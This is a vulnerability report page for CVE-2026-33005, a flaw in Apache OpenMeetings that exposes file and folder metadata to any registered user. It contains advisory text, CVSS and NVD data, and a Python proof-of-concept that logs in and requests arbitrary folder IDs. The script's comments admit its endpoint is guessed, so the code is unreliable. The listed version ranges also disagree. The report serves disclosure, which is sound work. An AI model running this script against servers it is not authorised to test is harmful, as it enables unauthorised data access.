Security Vulnerability Report
CVE-2026-33005 CVSS 4.3 MEDIUM

Published: 2026-04-09 16:16:27
Last Modified: 2026-04-15 15:27:06

Description

Improper Handling of Insufficient Privileges vulnerability in Apache OpenMeetings. Any registered user can query the web service with their own credentials and retrieve the files and sub-folders of any folder by ID (metadata only, not contents). The metadata includes id, type, name and some other fields; the full list of fields can be checked in the FileItemDTO object. This issue affects Apache OpenMeetings from 3.10 before 9.0.0. Users are recommended to upgrade to version 9.0.0, which fixes the issue.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:openmeetings:*:*:*:*:*:*:*:* - VULNERABLE
Apache OpenMeetings >= 3.10, < 9.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Proof of Concept for CVE-2026-33005
# Vulnerability: Improper Handling of Insufficient Privileges in Apache OpenMeetings
# Impact: Low-privilege users can access file metadata of arbitrary folders.

TARGET_HOST = "http://example-openmeetings.com"
USERNAME = "attacker"
PASSWORD = "password"
TARGET_FOLDER_ID = "1"  # ID of the folder to inspect


def main():
    session = requests.Session()

    # Step 1: Login to get a valid session/cookie
    login_url = f"{TARGET_HOST}/services/user/login"
    login_data = {
        "username": USERNAME,
        "userpass": PASSWORD,
    }

    try:
        print(f"[+] Attempting login as {USERNAME}...")
        r = session.post(login_url, json=login_data, timeout=15)
        if r.status_code != 200:
            print("[-] Login failed.")
            return
        print("[+] Login successful.")

        # Step 2: Request file metadata for a specific folder ID
        # The endpoint might be /services/room/file/list/{roomId} or similar depending on API version
        # Here we simulate a request to fetch file items by ID
        exploit_url = f"{TARGET_HOST}/services/room/file/{TARGET_FOLDER_ID}"
        print(f"[+] Fetching metadata for folder ID: {TARGET_FOLDER_ID}")
        response = session.get(exploit_url, timeout=15)

        if response.status_code == 200:
            print("[+] Request successful!")
            print("[+] Response Data:")
            try:
                print(response.json())
            except ValueError:
                # Body was not JSON; fall back to the raw text
                print(response.text)
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    main()

References

https://lists.apache.org/thread/pttoprd628g3xr6lpp3bm1z8m3z8t4p7 (Mailing List, Vendor Advisory)
https://openmeetings.apache.org/openmeetings-db/apidocs/org.apache.openmeetings.db/org/apache/openmeetings/db/dto/file/FileItemDTO.html (Product)
http://www.openwall.com/lists/oss-security/2026/04/09/10 (Mailing List, Third Party Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-33005",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-09T16:16:26.823",
    "lastModified": "2026-04-15T15:27:05.930",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Improper Handling of Insufficient Privileges vulnerability in Apache OpenMeetings.\n\nAny registered user can query web service with their credentials and get files/sub-folders of any folder by ID (metadata only NOT contents). Metadata includes id, type, name and some other field. Full list of fields get be checked at FileItemDTO object.\n\nThis issue affects Apache OpenMeetings: from 3.10 before 9.0.0.\n\nUsers are recommended to upgrade to version 9.0.0, which fixes the issue."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-274"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:apache:openmeetings:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "3.1.0",
                "versionEndExcluding": "9.0.0",
                "matchCriteriaId": "DDF05947-6FA6-438F-83E5-F484EC43F6B2"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://lists.apache.org/thread/pttoprd628g3xr6lpp3bm1z8m3z8t4p7",
        "source": "[email protected]",
        "tags": ["Mailing List", "Vendor Advisory"]
      },
      {
        "url": "https://openmeetings.apache.org/openmeetings-db/apidocs/org.apache.openmeetings.db/org/apache/openmeetings/db/dto/file/FileItemDTO.html",
        "source": "[email protected]",
        "tags": ["Product"]
      },
      {
        "url": "http://www.openwall.com/lists/oss-security/2026/04/09/10",
        "source": "af854a3a-2127-422b-91ae-364da2661108",
        "tags": ["Mailing List", "Third Party Advisory"]
      }
    ]
  }
}